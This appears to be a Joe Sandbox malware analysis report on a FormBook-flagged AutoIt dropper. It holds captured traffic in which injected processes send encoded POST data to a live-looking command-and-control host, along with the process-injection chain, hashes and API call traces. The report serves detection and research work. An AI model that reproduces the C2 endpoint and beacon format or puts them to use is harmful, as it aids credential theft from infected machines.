Jan 10, 2025 16:44:55.404256105 CET	715	IN	HTTP/1.1 403 Forbidden Connection: close x-powered-by: PHP/5.6.40 set-cookie: csrf_cookie_name=72c6b904c39735c8958616180baef3de; expires=Fri, 10-Jan-2025 17:44:55 GMT; Max-Age=7200; path=/ content-type: text/html; charset=UTF-8 content-length: 196 content-encoding: gzip vary: Accept-Encoding date: Fri, 10 Jan 2025 15:44:55 GMT server: LiteSpeed platform: hostinger strict-transport-security: max-age=31536000; includeSubDomains; preload x-xss-protection: 1; mode=block x-content-type-options: nosniff Data Raw: 1f 8b 08 00 00 00 00 00 00 03 2d 4f bb 6e c3 30 0c 9c ad af 60 b5 b7 42 b6 0c 34 81 a2 f5 dc 0e 01 82 8c 8c c5 56 02 14 2a 95 69 17 f9 fb c0 4e a6 c3 bd 70 38 7c f9 fc fa 38 9c be 07 48 76 29 e4 70 05 28 ac bf bd 17 f5 ab 20 1c c9 e1 45 8c 61 4c dc 26 b1 de cf f6 f3 ba 5f 5d cb 56 84 86 d6 6a c3 f0 20 ce 61 78 96 ce 35 de c8 75 18 f3 02 39 f6 7e ac 6a 9c 55 9a 27 d7 75 98 76 f4 ae b0 95 e1 c8 13 0c 3a d6 59 4d 9a 44 0c 69 b7 65 ae 74 48 02 3c 5a ae 0a b7 3a 43 e2 45 a0 c9 df 2c 93 49 84 3c 81 56 03 2e a5 fe 4b 7c c3 70 a5 0e 43 cc 0b 39 0c 8f 7d 0c db b7 3b c1 62 56 05 eb 00 00 00 Data Ascii: -On0`B4V*iNp8\|8Hv)p( EaL&_]Vj ax5u9~jU'uv:YMDietH<Z:CE,I<V.K\|pC9};bV

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
43	192.168.2.5	50019	93.127.192.201	80	2412	C:\Program Files (x86)\NRsiJCiVwpoShpkQEZDbuMKFJSbzegOUCaViPGnaM\WnOFOMnqmLQAP.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 16:44:57.344916105 CET	1891	OUT	POST /qfbg/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate Accept-Language: en-US Host: www.al-madinatraders.shop Cache-Control: no-cache Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 1239 Origin: http://www.al-madinatraders.shop Referer: http://www.al-madinatraders.shop/qfbg/ User-Agent: Mozilla/5.0 (Linux; Android 4.0.4; Mystery Android Smart TV Build/MYSTERY.SMARTTV.20130816) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.107 Safari/537.36 OPR/29.0.1809.93516 Data Raw: 56 38 3d 49 71 62 36 74 69 53 6b 71 4a 4c 63 73 39 66 46 6a 4a 62 66 49 39 63 79 4b 38 73 68 46 63 4e 57 33 54 4d 63 46 37 4f 72 77 6e 65 71 54 78 6b 7a 65 66 53 58 58 70 2b 6d 4a 62 59 4a 63 7a 36 55 35 79 4b 2f 41 56 34 6b 35 4a 5a 74 7a 44 36 41 2b 6e 48 52 77 4a 49 5a 56 59 52 57 73 2f 51 78 66 44 30 48 43 6f 79 57 58 37 72 6a 62 7a 63 41 57 50 50 7a 52 63 33 31 79 5a 6b 4c 34 44 36 6b 73 57 49 4e 78 34 59 66 65 79 66 43 52 7a 36 6d 6f 61 4d 4c 73 42 53 50 42 50 4e 46 44 38 49 73 77 54 2f 54 41 73 6b 33 78 57 49 64 6e 52 57 45 49 65 5a 77 41 4e 70 65 4f 57 72 77 66 6d 4e 5a 36 33 34 49 61 2b 5a 35 74 61 53 6a 56 2f 30 76 43 38 77 69 62 35 6e 46 7a 50 78 50 6b 65 58 70 30 45 33 53 34 64 56 37 79 70 5a 73 4e 34 69 2f 4e 59 74 5a 69 32 61 6c 47 6a 39 30 30 48 39 6b 41 53 30 50 35 4a 53 30 58 6c 66 63 33 71 64 4c 67 4c 6e 44 48 62 51 6e 6a 48 50 38 64 37 36 31 67 51 56 74 38 50 30 78 47 4f 35 4a 71 65 53 4c 39 32 36 76 77 59 4f 63 65 76 67 33 51 31 36 63 7a 47 46 56 54 4c 37 72 77 5a 39 55 66 49 31 [TRUNCATED] Data Ascii: V8=Iqb6tiSkqJLcs9fFjJbfI9cyK8shFcNW3TMcF7OrwneqTxkzefSXXp+mJbYJcz6U5yK/AV4k5JZtzD6A+nHRwJIZVYRWs/QxfD0HCoyWX7rjbzcAWPPzRc31yZkL4D6ksWINx4YfeyfCRz6moaMLsBSPBPNFD8IswT/TAsk3xWIdnRWEIeZwANpeOWrwfmNZ634Ia+Z5taSjV/0vC8wib5nFzPxPkeXp0E3S4dV7ypZsN4i/NYtZi2alGj900H9kAS0P5JS0Xlfc3qdLgLnDHbQnjHP8d761gQVt8P0xGO5JqeSL926vwYOcevg3Q16czGFVTL7rwZ9UfI195xh6AZQzmo3NP+b8FlJwN34yHT5LEEa8HoTQOsDTx2K+JAYEiq9jRA2IsW9x7svBdrkafmQ00z/FgvUoL3jMrK/ZSawyP9vmfaSs4FBDRdPBZjXvRiz987mLSeZ9sysyBqV49pxEds2+VY2hE1KS8sRj+VVS6uqPHBpGIbLxqqUyLcxkeQQLuunxTgkh8S6P2d5YLy/i9+pcB3k+b7QkavVnRf8+aHdr/d+K0pHfQYzp2BdcY96bF+F5gXsxEAsVQJGdQqLdjBSPjqtBBSObUJItEUOqlQnhyeVbqNURgeQKXjdJ0qU6+c8vkIquhhwUUS9RhpRRfstC6uNSN8vA3wNI7D2p5J0wRgjO4X3sj4iLJGTm3JbF3dU0KBN80RMdJdR2YrTrkjPg9M9F2LIjBRQQtwUf3Nkcvtzk64sMNFTHt56RilTomL1tSWFiNu1TJYTzz/1BUE01duZGX6IPuUrEz9Jk7urNz1nlBr1y6u1y/ujlk+LLuv0uIQ4bvdfdxl6esn59R4Lf8KOjQ4EAgYnWpWjPbiepTD/DMLa7UVtjDoyamlNjpe9qfS7A5C3OeJsdo80n3f550kKMLni4tKJa5jzbgh3FebUa8A+qXMHZ031WDNAhoY7ZH+cdSd4S9iRTGv4thTeofMYGQydSrU7JeS4fs0Jq5 [TRUNCATED]
Jan 10, 2025 16:44:57.939332008 CET	715	IN	HTTP/1.1 403 Forbidden Connection: close x-powered-by: PHP/5.6.40 set-cookie: csrf_cookie_name=d5496703b2e2cd91e435e2cfe33cb86a; expires=Fri, 10-Jan-2025 17:44:57 GMT; Max-Age=7200; path=/ content-type: text/html; charset=UTF-8 content-length: 196 content-encoding: gzip vary: Accept-Encoding date: Fri, 10 Jan 2025 15:44:57 GMT server: LiteSpeed platform: hostinger strict-transport-security: max-age=31536000; includeSubDomains; preload x-xss-protection: 1; mode=block x-content-type-options: nosniff Data Raw: 1f 8b 08 00 00 00 00 00 00 03 2d 4f bb 6e c3 30 0c 9c ad af 60 b5 b7 42 b6 0c 34 81 a2 f5 dc 0e 01 82 8c 8c c5 56 02 14 2a 95 69 17 f9 fb c0 4e a6 c3 bd 70 38 7c f9 fc fa 38 9c be 07 48 76 29 e4 70 05 28 ac bf bd 17 f5 ab 20 1c c9 e1 45 8c 61 4c dc 26 b1 de cf f6 f3 ba 5f 5d cb 56 84 86 d6 6a c3 f0 20 ce 61 78 96 ce 35 de c8 75 18 f3 02 39 f6 7e ac 6a 9c 55 9a 27 d7 75 98 76 f4 ae b0 95 e1 c8 13 0c 3a d6 59 4d 9a 44 0c 69 b7 65 ae 74 48 02 3c 5a ae 0a b7 3a 43 e2 45 a0 c9 df 2c 93 49 84 3c 81 56 03 2e a5 fe 4b 7c c3 70 a5 0e 43 cc 0b 39 0c 8f 7d 0c db b7 3b c1 62 56 05 eb 00 00 00 Data Ascii: -On0`B4V*iNp8\|8Hv)p( EaL&_]Vj ax5u9~jU'uv:YMDietH<Z:CE,I<V.K\|pC9};bV

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
44	192.168.2.5	50020	93.127.192.201	80	2412	C:\Program Files (x86)\NRsiJCiVwpoShpkQEZDbuMKFJSbzegOUCaViPGnaM\WnOFOMnqmLQAP.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 16:44:59.897289991 CET	584	OUT	GET /qfbg/?V8=FozauU3I+LP/9Nj8g7b6dv8gCpZwHtVW5jJ9IM/S40uIbg9HP9G2UPrJfaUkURrP7SWnfEhe84Vk8Ui0+mXxkZIdFJ1enIwMA3s4LYaZdtjwXCRSGeLNYZPp7qU7y2jovw==&Bb6h7=gBiPvnrHa HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US Host: www.al-madinatraders.shop Connection: close User-Agent: Mozilla/5.0 (Linux; Android 4.0.4; Mystery Android Smart TV Build/MYSTERY.SMARTTV.20130816) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.107 Safari/537.36 OPR/29.0.1809.93516
Jan 10, 2025 16:45:00.490494013 CET	706	IN	HTTP/1.1 404 Not Found Connection: close x-powered-by: PHP/5.6.40 set-cookie: csrf_cookie_name=7078c20c62b822c92d1ce806daae05bb; expires=Fri, 10-Jan-2025 17:45:00 GMT; Max-Age=7200; path=/ content-type: text/html; charset=UTF-8 content-length: 234 date: Fri, 10 Jan 2025 15:45:00 GMT server: LiteSpeed platform: hostinger strict-transport-security: max-age=31536000; includeSubDomains; preload x-xss-protection: 1; mode=block x-content-type-options: nosniff Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 09 3c 64 69 76 20 69 64 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 09 09 3c 68 31 3e 34 30 34 20 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 09 09 3c 70 3e 54 68 65 20 70 61 67 65 20 79 6f 75 20 72 65 71 75 65 73 74 65 64 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 09 3c 2f 64 69 76 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><title>404 Page Not Found</title></head><body><div id="container"><h1>404 Page Not Found</h1><p>The page you requested was not found.</p></div></body></html>

Target ID:	0
Start time:	10:40:56
Start date:	10/01/2025
Path:	C:\Users\user\Desktop\NWPZbNcRxL.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\NWPZbNcRxL.exe"
Imagebase:	0xc10000
File size:	1'255'936 bytes
MD5 hash:	37148A3441BCC11C173F13E149C7284B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	10:40:57
Start date:	10/01/2025
Path:	C:\Windows\SysWOW64\svchost.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\NWPZbNcRxL.exe"
Imagebase:	0x760000
File size:	46'504 bytes
MD5 hash:	1ED18311E3DA35942DB37D15FA40CC5B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2417007133.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2417341861.0000000003800000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2417817350.0000000005400000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	10:41:25
Start date:	10/01/2025
Path:	C:\Program Files (x86)\NRsiJCiVwpoShpkQEZDbuMKFJSbzegOUCaViPGnaM\WnOFOMnqmLQAP.exe
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\NRsiJCiVwpoShpkQEZDbuMKFJSbzegOUCaViPGnaM\WnOFOMnqmLQAP.exe"
Imagebase:	0x80000
File size:	140'800 bytes
MD5 hash:	32B8AD6ECA9094891E792631BAEA9717
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.4504631608.0000000004530000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	5
Start time:	10:41:27
Start date:	10/01/2025
Path:	C:\Windows\SysWOW64\logman.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\SysWOW64\logman.exe"
Imagebase:	0x650000
File size:	98'816 bytes
MD5 hash:	AE108F4DAAB2DD68470AC41F91A7A4E9
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.4504489847.0000000002D20000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.4503536884.0000000002730000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.4503787893.0000000002B00000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	moderate
Has exited:	false

Show Windows behavior

Target ID:	7
Start time:	10:41:40
Start date:	10/01/2025
Path:	C:\Program Files (x86)\NRsiJCiVwpoShpkQEZDbuMKFJSbzegOUCaViPGnaM\WnOFOMnqmLQAP.exe
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\NRsiJCiVwpoShpkQEZDbuMKFJSbzegOUCaViPGnaM\WnOFOMnqmLQAP.exe"
Imagebase:	0x80000
File size:	140'800 bytes
MD5 hash:	32B8AD6ECA9094891E792631BAEA9717
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.4506381463.0000000005550000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	8
Start time:	10:41:52
Start date:	10/01/2025
Path:	C:\Program Files\Mozilla Firefox\firefox.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Mozilla Firefox\Firefox.exe"
Imagebase:	0x7ff79f9e0000
File size:	676'768 bytes
MD5 hash:	C86B1BE9ED6496FE0E0CBE73F81D8045
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	3.7%
Dynamic/Decrypted Code Coverage:	0.4%
Signature Coverage:	6.6%
Total number of Nodes:	2000
Total number of Limit Nodes:	159

Executed Functions

Function 00C13B3A Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 153
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00C13B68
IsDebuggerPresent.KERNEL32 ref: 00C13B7A
GetFullPathNameW.KERNEL32(00007FFF,?,?,00CD52F8,00CD52E0,?,?), ref: 00C13BEB

Part of subcall function 00C17BCC: _memmove.LIBCMT ref: 00C17C06

Part of subcall function 00C2092D: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00C13C14,00CD52F8,?,?,?), ref: 00C2096E

SetCurrentDirectoryW.KERNEL32(?), ref: 00C13C6F
MessageBoxA.USER32(00000000,This is a third-party compiled AutoIt script.,00CC7770,00000010), ref: 00C4D281
SetCurrentDirectoryW.KERNEL32(?,00CD52F8,?,?,?), ref: 00C4D2B9
GetForegroundWindow.USER32(runas,?,?,?,00000001,?,00CC4260,00CD52F8,?,?,?), ref: 00C4D33F
ShellExecuteW.SHELL32(00000000,?,?), ref: 00C4D346

Part of subcall function 00C13A46: GetSysColorBrush.USER32(0000000F), ref: 00C13A50
Part of subcall function 00C13A46: LoadCursorW.USER32(00000000,00007F00), ref: 00C13A5F
Part of subcall function 00C13A46: LoadIconW.USER32(00000063), ref: 00C13A76
Part of subcall function 00C13A46: LoadIconW.USER32(000000A4), ref: 00C13A88
Part of subcall function 00C13A46: LoadIconW.USER32(000000A2), ref: 00C13A9A
Part of subcall function 00C13A46: LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00C13AC0
Part of subcall function 00C13A46: RegisterClassExW.USER32(?), ref: 00C13B16

Part of subcall function 00C139D5: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,) and __cdecl calling conventions. The __stdcall (WINAPI) convention is used by default but __cdecl can be used instead. See the,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00C13A03
Part of subcall function 00C139D5: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00C13A24
Part of subcall function 00C139D5: ShowWindow.USER32(00000000,?,?), ref: 00C13A38
Part of subcall function 00C139D5: ShowWindow.USER32(00000000,?,?), ref: 00C13A41

Part of subcall function 00C1434A: _memset.LIBCMT ref: 00C14370
Part of subcall function 00C1434A: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00C14415

Strings

This is a third-party compiled AutoIt script., xrefs: 00C4D279
runas, xrefs: 00C4D33A

Memory Dump Source

Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd

Similarity

API ID: LoadWindow$Icon$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__memmove_memset
String ID: This is a third-party compiled AutoIt script.$runas
API String ID: 529118366-3287110873
Opcode ID: de5dfd1ea3e528640fcad6b76919c5b05a814994558176ef6f28946e5567ccf5
Instruction ID: 50bb9733143720ef05e386466da9bbd2bed0ed78afbf5453832dfac18a333dff
Opcode Fuzzy Hash: de5dfd1ea3e528640fcad6b76919c5b05a814994558176ef6f28946e5567ccf5
Instruction Fuzzy Hash: D8510A70E08148EECF11EBB5DC15FED7B74AF46714F00426BF462A22A1DA708686FB61

Function 00C149A0 Relevance: 10.7, APIs: 7, Instructions: 223
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetVersionExW.KERNEL32(?), ref: 00C149CD

Part of subcall function 00C17BCC: _memmove.LIBCMT ref: 00C17C06

GetCurrentProcess.KERNEL32(?,00C9FAEC,00000000,00000000,?), ref: 00C14A9A
IsWow64Process.KERNEL32(00000000), ref: 00C14AA1
GetNativeSystemInfo.KERNELBASE(00000000), ref: 00C14AE7
FreeLibrary.KERNEL32(00000000), ref: 00C14AF2
GetSystemInfo.KERNEL32(00000000), ref: 00C14B23
GetSystemInfo.KERNEL32(00000000), ref: 00C14B2F

Memory Dump Source

Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd

Similarity

API ID: InfoSystem$Process$CurrentFreeLibraryNativeVersionWow64_memmove
String ID:
API String ID: 1986165174-0
Opcode ID: 771eff3e61fb6547d34b0e23a978fdbe9f3201f5e7fe819061aebeb0399ec6bc
Instruction ID: f93c5dd7b6ead0d7e38c7a6945980b5e1cac89386120c3858514e801e4952193
Opcode Fuzzy Hash: 771eff3e61fb6547d34b0e23a978fdbe9f3201f5e7fe819061aebeb0399ec6bc
Instruction Fuzzy Hash: 8C91C53198D7C0DEC735DB6894506EAFFF5BF2A300B4449AED0D793A41D220E688E769

Function 00C14E89 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 62
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateStreamOnHGlobal.COMBASE(00000000,00000001,?,?,?,?,?,00C14D8E,?,?,00000000,00000000), ref: 00C14E99
FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,00C14D8E,?,?,00000000,00000000), ref: 00C14EB0
LoadResource.KERNEL32(?,00000000,?,?,00C14D8E,?,?,00000000,00000000,?,?,?,?,?,?,00C14E2F), ref: 00C4D937
SizeofResource.KERNEL32(?,00000000,?,?,00C14D8E,?,?,00000000,00000000,?,?,?,?,?,?,00C14E2F), ref: 00C4D94C
LockResource.KERNEL32(00C14D8E,?,?,00C14D8E,?,?,00000000,00000000,?,?,?,?,?,?,00C14E2F,00000000), ref: 00C4D95F

Strings

SCRIPT, xrefs: 00C14EA6

Memory Dump Source

Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd

Similarity

API ID: Resource$CreateFindGlobalLoadLockSizeofStream
String ID: SCRIPT
API String ID: 3051347437-3967369404
Opcode ID: e3532827732289bcff4fa2e693fa4ac1b7dadee96052de310ebdb50416e13ff7
Instruction ID: ec3ca390986dce1c7bfcf37dd801091686abca3f49e0e0749dcaddf68dcdf264
Opcode Fuzzy Hash: e3532827732289bcff4fa2e693fa4ac1b7dadee96052de310ebdb50416e13ff7
Instruction Fuzzy Hash: CC115EB5240700BFD7258B65EC48F6BBBBAFFC6B11F20426DF416C6250DBA1E8419660

Function 00C147D0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 59COMMON

Download Yara Rule

APIs

IsThemeActive.UXTHEME ref: 00C14834

Part of subcall function 00C3336C: __lock.LIBCMT ref: 00C33372
Part of subcall function 00C3336C: DecodePointer.KERNEL32(00000001,?,00C14849,00C67C74), ref: 00C3337E
Part of subcall function 00C3336C: EncodePointer.KERNEL32(?,?,00C14849,00C67C74), ref: 00C33389

Part of subcall function 00C148FD: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 00C14915
Part of subcall function 00C148FD: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00C1492A

Part of subcall function 00C13B3A: GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00C13B68
Part of subcall function 00C13B3A: IsDebuggerPresent.KERNEL32 ref: 00C13B7A
Part of subcall function 00C13B3A: GetFullPathNameW.KERNEL32(00007FFF,?,?,00CD52F8,00CD52E0,?,?), ref: 00C13BEB
Part of subcall function 00C13B3A: SetCurrentDirectoryW.KERNEL32(?), ref: 00C13C6F

SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00C14874

Strings

(l, xrefs: 00C147D6

Memory Dump Source

Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd

Similarity

API ID: InfoParametersSystem$CurrentDirectoryPointer$ActiveDebuggerDecodeEncodeFullNamePathPresentTheme__lock
String ID: (l
API String ID: 1438897964-844116408
Opcode ID: a1fae390ba68466046658ee00300ae0af7375f70caf63a05e6591be656431c03
Instruction ID: 50aaf9b64047f2b17b82387c88f5aeb18ec357ad2c701ffd3c16336f1a695e0d
Opcode Fuzzy Hash: a1fae390ba68466046658ee00300ae0af7375f70caf63a05e6591be656431c03
Instruction Fuzzy Hash: E5119D719093419FD700EF69D845B4EBBE8EF8A750F10891FF040872B1DB70968ADB92

Function 00C7445A Relevance: 4.5, APIs: 3, Instructions: 25fileCOMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(?,00C4E398), ref: 00C7446A
FindFirstFileW.KERNELBASE(?,?), ref: 00C7447B
FindClose.KERNEL32(00000000), ref: 00C7448B

Memory Dump Source

Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd

Similarity

API ID: FileFind$AttributesCloseFirst
String ID:
API String ID: 48322524-0
Opcode ID: 420bab4d1e85da9d9d50ae8ffb64f813b75c7327bdd41793024726552eabcdfb
Instruction ID: 1e19c7620982435d0a540c239cb81483652b38c292e5d6180820064c861f636c
Opcode Fuzzy Hash: 420bab4d1e85da9d9d50ae8ffb64f813b75c7327bdd41793024726552eabcdfb
Instruction Fuzzy Hash: C4E02033410900A742146B38EC0D7ED7B5C9F05335F24471BF939C10E0E7745D00A5D5

Function 00C209D0 Relevance: 57.3, APIs: 27, Strings: 5, Instructions: 1300windowsleeptimeCOMMON

Download Yara Rule

APIs

PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00C20A5B
timeGetTime.WINMM ref: 00C20D16
PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00C20E53
Sleep.KERNEL32(0000000A), ref: 00C20E61
LockWindowUpdate.USER32(00000000,?,?), ref: 00C20EFA
DestroyWindow.USER32 ref: 00C20F06
GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00C20F20
Sleep.KERNEL32(0000000A,?,?), ref: 00C54E83
TranslateMessage.USER32(?), ref: 00C55C60
DispatchMessageW.USER32(?), ref: 00C55C6E
GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00C55C82

Strings

@GUI_CTRLHANDLE, xrefs: 00C54FE4
@COM_EVENTOBJ, xrefs: 00C554F0
@GUI_WINHANDLE, xrefs: 00C54F8F
@TRAY_ID, xrefs: 00C5578F
@GUI_CTRLID, xrefs: 00C54F3A

Memory Dump Source

Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
